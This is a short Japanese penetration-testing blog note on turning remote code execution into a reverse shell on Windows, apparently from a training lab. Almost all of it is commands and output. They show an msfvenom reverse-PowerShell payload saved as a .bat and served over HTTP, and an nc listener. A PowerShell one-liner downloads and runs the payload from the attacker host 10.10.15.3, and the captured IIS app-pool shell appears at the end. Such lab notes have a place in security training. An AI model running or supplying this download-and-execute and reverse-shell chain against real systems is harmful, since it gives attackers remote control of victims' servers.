Shinobi Style

Footprint To Marvelous Hacker

RCEからリバースシェルを取得する

pentest

ペイロード作成

$ msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.15.3 LPORT=4444  > aaa.bat
$ python3 -m http.server 12345

リスナー作成

$ nc -lnvp 4444

RCEでコード実行

powershell -c "Invoke-WebRequest 'http://10.10.15.3:12345/aaa.bat' -OutFile 'c:\Users\Public\Downloads\aaa.bat';c:\Users\Public\Downloads\aaa.bat"

シェル取得

$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.203 59117
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

参考